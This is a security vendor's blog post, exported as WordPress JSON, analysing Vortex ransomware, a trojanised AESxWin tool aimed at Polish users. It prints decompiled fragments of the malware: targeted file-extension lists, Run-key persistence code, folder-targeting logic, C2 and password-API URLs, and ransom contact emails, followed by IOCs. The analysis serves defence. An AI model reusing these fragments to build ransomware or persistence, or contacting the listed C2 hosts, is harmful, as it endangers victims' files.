{"id":2388,"date":"2024-09-25T17:49:09","date_gmt":"2024-09-25T17:49:09","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2388"},"modified":"2025-07-29T03:38:19","modified_gmt":"2025-07-29T03:38:19","slug":"do-the-twist-vortex-ransomware-spins-and-scrambles-victim-data","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/do-the-twist-vortex-ransomware-spins-and-scrambles-victim-data\/","title":{"rendered":"Do the twist: Vortex ransomware spins and scrambles victim data"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

Earlier this year, we witnessed a new ransomware variant, Vortex, evolve from a previous strain, Polski. The most recent strain was developed using a freeware encryption and decryption tool called AESxWin, which was modified to give Vortex its malicious nature. Both primarily target Polish users.

Vortex has some very unorthodox characteristics, so let\u2019s take a closer look.

Delivery<\/strong>

Vortex is not spread through the usual spam email campaigns, instead its authors prefer to use RAT (Remote Access Trojans) as the delivery tool. The specific agent downloaders were JS\/VJworm (JavaScript) variants.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 1 – Delivery representation<\/em>

Infection<\/strong>

Static analysis:

MD5: 91A07550E5CA2C977F50406F07126AC8<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 1 Version information

The version information lists AESxWin as both the product name and original file name. AESxWin is a free tool available from github and is used for encrypting and decrypting files. The image below shows that even the file\u2019s icon is the same:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Figure 2 – File Icons<\/em>

Both files are compiled with dotnet compiler and the target framework is .net 4.5.  

Code analysis (comparing AESxWin file and Vortex ransomware file)<\/strong>

The below image illustrates some of the differences between the legitimate AESxWin file and the Vortex ransomware \u2013 the upper portion contains the legitimate file, and the ransomware lies in the lower. <\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\"\" Figure 3 – Comparison<\/em>

The malicious, modified version contains extra routines like AESxWinAuto, Form1, pro and Reg. Examining these routines illustrates the behaviours of the ransomware variant:

AESxWinAuto:<\/p>\n\n\n\n

 public class AESxWinAuto : Form
 {
 public static string[] image_ext = new string[]
 public static string[] video_ext = new string[]
 public static string[] audio_ext = new string[]
 public static string[] document_ext = new string[]
 public static string[] compressed_ext = new string[]
 public static string[] code_ext = new string[<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Each of these strings can be expanded, showing the targeted file format. For image_ext, we found the following extensions:<\/p>\n\n\n\n

 .jpg,.jpeg,.png,.gif,.bmp,.groups,.hdd,.hpp,.m2ts,.m4p,.mpeg,.ndf,.nvram,.ogg,.ost,.pab,
.pdb,.pif,.qed,.qcow,.qcow2,.rvt,.st7,.stm,.vbox,.vdi,.vhd,.vhdx,.vmdk,.vmsd,.vmx,.vmxf, .3fr,
.3pr,.ab4,.accde,.accdr,.accdt,.ach,.acr,.adb,.ads,.agdl,.ait,.apj,.asm,.awg,.back,.backup,
.backupdb,.bay,.bdb,.bgt,.bik,.bpw,.cdr3,.cdr4,.cdr5,.cdr6,.cdrw,.ce1,.ce2,.cib,.craw,.crw,
.csh,.csl,.db_journal,.dc2,.dcs,.ddoc,.ddrw,.der,.des,.dgc,.djvu,.dng,.drf,.dxg,.eml,.erbsql,
.erf,.exf,.ffd,.fh,.fhd,.gray,.grey,.gry,.hbk,.ibd,.ibz,.iiq,.incpas,.jpe,.kc2,.kdbx,.kdc,.kpdx,.lua,
.mdc,.mef,.mfw,.mmw,.mny,.mrw,.myd,.ndd,.nef,.nk2,.nop,.nrw,.ns2,.ns3,.ns4,.nwb,.nx2,
.nxl,.nyf,.odb,.odf,.odg,.odm,.orf,.otg,.oth,.otp,.ots,.ott,.p12,.p7b,.p7c,.pdd,.pem,.plus_muhd,
.plc,.pot,.pptx,.psafe3,.py,.qba,.qbr,.qbw,.qbx,.qby,.raf,.rat,.raw,.rdb,.rwl,.rwz,.s3db,.sd0,.sda,
.sdf,.sqlite,.sqlite3,.sqlitedb,.sr2,.srf,.srw,.st5,.st8,.std,.sti,.stw,.stx,.sxd,.sxg,.sxi,.sxm,.tex,
.wallet,.wb2,.wpd,.x11,.x3f,.xis,.ycbcra,.yuv,.contact,.dbx,.doc,.docx,.jnt,.msg,.oab,.ods,.pdf,
.pps,.ppsm,.ppt,.pptm,.prf,.pst,.rar,.rtf,.wab,.xls,.xlsx,.xml,.zip,.1cd,.3ds,.3g2,.3gp,.7z,.7zip,
.accdb,.aoi,.asf,.asp,.aspx,.asx,.avi,.bak,.cer,.cfg,.class,.config,.css,.csv,.db,.dds,.dwg,.dxf,
.flf,.flv,.html,.idx,.js,.key,.kwm,.laccdb,.ldf,.lit,.m3u,.mbx,.md,.mdf,.mid,.mlb,.mov,.mp4,.mpg
,.obj,.odt,.ods,.odp,.pages,.php,.psd,.pwm,.rm,.safe,.sav,.save,.sql,.srt,.swf,.thm,.vob,.wav,
.wma,.wmv,.xlsb3dm,.aac,.ai,.arw,.c,.cdr,.cls,.cpi,.cpp,.cs,.db3,.docm,.dot,.dotm,.dotx,.drw,
.dxb,.eps,.fla,.flac,.fxg,.java,.m,.m4v,.max,.mdb,.pcd,.pct,.pl,.potm,.potx,.ppam,.ppsm,.ppsx,
.pptm,.ps,.r3d,.rw2,.sldm,.sldx,.svg,.tga,.wps,.xla,.xlam,.xlm,.xlr,.xlsm,.xlt,.xltm,.xltx,.xlw,.act,
.adp,.al,.bkp,.blend,.cdf,.cdx,.cgm,.cr2,.crt,.dac,.dbf,.dcr,.ddd,.design,.dtd,.fdb,.fff,.fpx,.h,.iif,
.indd,.jpeg,.mos,.nd,.nsd,.nsf,.nsg,.nsh,.odc,.odp,.oil,.pas,.pat,.pef,.pfx,.ptx,.qbb,.qbm,.sas7bdat,
.say,.st4,.st6,.stc,.sxc,.sxw,.tlg,.wad,.xlk,.aiff,.bin,.cmt,.dat,.dit,.edb,.flvv,.ntx,.xsd,.pem,.xsd,.xsl,
.ewd,.dbt,.ob,.gofin,.dsf,.ds4,.shx,.ath,.bac,.ts,.dst,.dwfx        <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

For video_ext, we found the following target extensions for video files:<\/p>\n\n\n\n

 .avi,.flv,.mov,.mp4,.mpg,.rm,.rmvb,.mkv,.swf,.vob,.wmv,.3g2,.3gp,.asf,.ogv<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

For audio_ext, we found the following target extensions for audio files:<\/p>\n\n\n\n

 .mp3,.wav,.acc,.ogg,.amr,.wma    <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

For document_ext, we found the following target extensions for document files:<\/p>\n\n\n\n

 .pdf,.txt,.rtf,.doc,.docx,.ppt,.pptx,.xls,.xlsx<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

For compressed_ext, we found the following target extensions for compressed folders:<\/p>\n\n\n\n

 .zip,.rar,.7z,.tar,.gzip<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

For code_ext we found the following target extensions for scripts and web page files:<\/p>\n\n\n\n

 .cs,.vb,.java,.py,.rb,.cpp,.html,.css,.js<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

We then found a startup entry registry function:<\/p>\n\n\n\n

 public bool IsStartup
 {
 get{
 RegistryKey registryKey =  Registry.CurrentUser.OpenSubKey(“SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run”,  true);
 return registryKey.GetValue(Assembly.GetExecutingAssembly().GetName().Name) != null;
 }set
 {
 Reg.RegisterInStartup(value, Application.ExecutablePath);
}<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n



This code includes an autostart entry to give the malware persistence. The \u2018Get\u2019 function notes the registry key name and looks for its presence. The \u2018Set\u2019 function appends another class, \u2018Reg\u2019, which registers the malware file location in the value entry. We then checked the \u2018Reg\u2019 class: <\/p>\n\n\n\n

 public static string Read(string KeyName)
 public static bool Write(string KeyName, object Value)
 public static void RegisterInStartup(bool isChecked, string executablePath)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

The above three strings can be expanded, but we\u2019ll just focus on the important points.

String Read(string KeyName) looks for the currentuser key in the registry and further seeks the subkey “SOFTWARE\\\\AESxWin”. Bool Write (string KeyName, object Value), creates the subkey “SOFTWARE\\\\AESxWin”, if the String Read function fails to find its subkey.

RegisterInStartup does the autostart work by adding the malware\u2019s physical location to the value of the \u2018Run\u2019 registry entry. This is the Reg class\u2019 primary function.

Other interesting functions<\/strong>

There are other interesting functions and codes to be examined. The following code ignores listed paths (locations) in the system. <\/p>\n\n\n\n

 private void InitIgnoredPaths()
 {
 this.IgnoredPaths = new List();
 this.IgnoredPaths.Add(Path.GetDirectoryName(Application.ExecutablePath));
 this.IgnoredPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
 this.IgnoredPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData));
 this.IgnoredPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData));
 this.IgnoredPaths.Add(“C:\\\\Program Files\\\\Common Files”);
 }<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n



The paths Vortex ignores are Application Data and Common Files. It is clear this variant wants to focus on specific locations and ignores those without important documents. <\/p>\n\n\n\n

 DriveInfo[] drives = FilesHelper.GetDrives();
 Guid computerId = this.ComputerId;
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.Personal));
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.Recent));
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures));
 \u2026
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic));
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos));
 this.StartPaths.Add(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory));
 DriveInfo[] array = drives;
 for (int i = 0; i < array.Length; i++)
 {
    DriveInfo driveInfo = array[i];
    this.StartPaths.Add(driveInfo.RootDirectory.Name);
 }<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n



This code looks for documents, pictures, videos and recent files \u2013 all of which are important locations for any user. <\/p>\n\n\n\n

 bool enabled = this.btnStartAutoEncrypt.Enabled;<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Auto encrypt is then enabled, started by the button: <\/p>\n\n\n\n

 btnStartAutoEncrypt_Click(object sender, EventArgs e)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

After the encryption, the ransomware appends the \u201c.ZABLOKOWANE” extension at the end of all encrypted files. A log of these encrypted files is stored in a .log file in the folder:

C:\\ProgramData\\Keyboard\\

The following code refers to the logging details and the above-mentioned location.

AESxWinAuto.LogPath = “C:\\\\ProgramData\\\\Keyboard”;

bool flag = !Directory.Exists(AESxWinAuto.LogPath);

if (flag)

{

Directory.CreateDirectory(AESxWinAuto.LogPath);

}

In the log file, we found the string format:     <\/p>\n\n\n\n

 Log.WriteLog(AESxWinAuto.LogPath, string.Format(“Zaszyfrowano: {0} | {1} Has\u0142o= {2}”, Path.GetFileName(text), text, (currentPassword.Length > 3) ?  currentPassword.Substring(0, 4) : currentPassword));
 string directoryName = Path.GetDirectoryName(text);
 bool flag4 = !StatusFile.StatusFileExist(directoryName, “### – ODZYSKAJ SWOJE  DANE – ###.TXT”);<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Command and Control<\/strong>

C2: https:\/\/asuspl.ml\/widwdp\/

C2: https:\/\/taniepilapl\/mij\/

Vortex gathers the victim\u2019s IP address with the public api: “api.ipify.org\u201d<\/p>\n\n\n\n

 @6002b94: ldloc.0 
 @6002b95: ldstr ;Aby Odzyska Pliki Skontaktuj Si Z Nami Pod Adresem:  3nigma@0.pl Lub 3nigma@firemail.cc 
 @6002b96: callvirt 0A00013A ;System.Text.StringBuilder::AppendLine<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

 We found the email address information in the above code. Password generation looks as though it\u2019s done with the help of an api \u2013 see the following code:<\/p>\n\n\n\n

 @6002a22: stsfld System.Int32 AESxWin.Helpers.PasswordAPICurrentIndex 
 @6002a23: ldc.i4.2 
 @6002a24: newarr System.Uri 
 @6002a25: dup 
 @6002a26: ldc.i4.0 
 @6002a27: ldstr ;https:\/\/asuspl.ml\/pass\/ <\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

The site \u2013 asuspl.ml\/pass \u2013 is used for a password generating api, similar to how api.ipify is used to gather the infected user\u2019s IP address.<\/p>\n\n\n\n

 @6002b2c: ldc.i4.1 
 @6002b2d: ldstr ;https:\/\/taniepilapl\/mij\/ 
 @6002b2e: stelem.ref 
 @6002b2f: stsfld System.String[] AESxWin.Helpers.SendAPIUrls<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

The above shows command and control details inside the code.

IOC details

Url:<\/strong>

Asuspl.ml\/pass

Api.ipify.org

taniepilapl\/mij

Email address:<\/strong>

3nigma@firemail.cc

3nigma@0.pl

File name:<\/strong>

The file name \u2018AESxWin.exe\u2019 is in a grey area in this case, because of the freeware encryption tool.

Registry:<\/strong>

SOFTWARE\\\\AESxWin

Run registry entry with value as AESxWin and physical location of the target file.

Extension: <\/strong>.ZABLOKOWANE

PDB:<\/strong> C:\\c1\\AESxWin-master\\AESxWin-master\\AESxWin\\obj\\Debug\\AESxWin.pdb

Conclusion<\/strong>

While this ransomware variant was clearly written with only Polish victims in mind, it goes to show how clever malware authors can be. Not only does Vortex use unorthodox propagation methods, it also piggy backs off the hard work of a legitimate software developer. 

Currently this ransomware will not infect Windows XP users, because it requires .Net framework 4.5 or higher to run, similar to the freeware tool. Later Windows versions with .Net framework 4.5 can allow the ransomware to execute and infect the system. 

 <\/p>\n","protected":false},"excerpt":{"rendered":"

Earlier this year, we witnessed a new ransomware variant, Vortex, evolve from a previous strain, Polski. The most recent strain was developed using a freeware encryption and decryption tool called AESxWin, which was modified to give Vortex its malicious nature. Both primarily target Polish users. Vortex has some very unorthodox characteristics, so let’s take a […]<\/p>\n","protected":false},"author":1,"featured_media":2402,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2388","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2388"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2388\/revisions"}],"predecessor-version":[{"id":4249,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2388\/revisions\/4249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2402"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}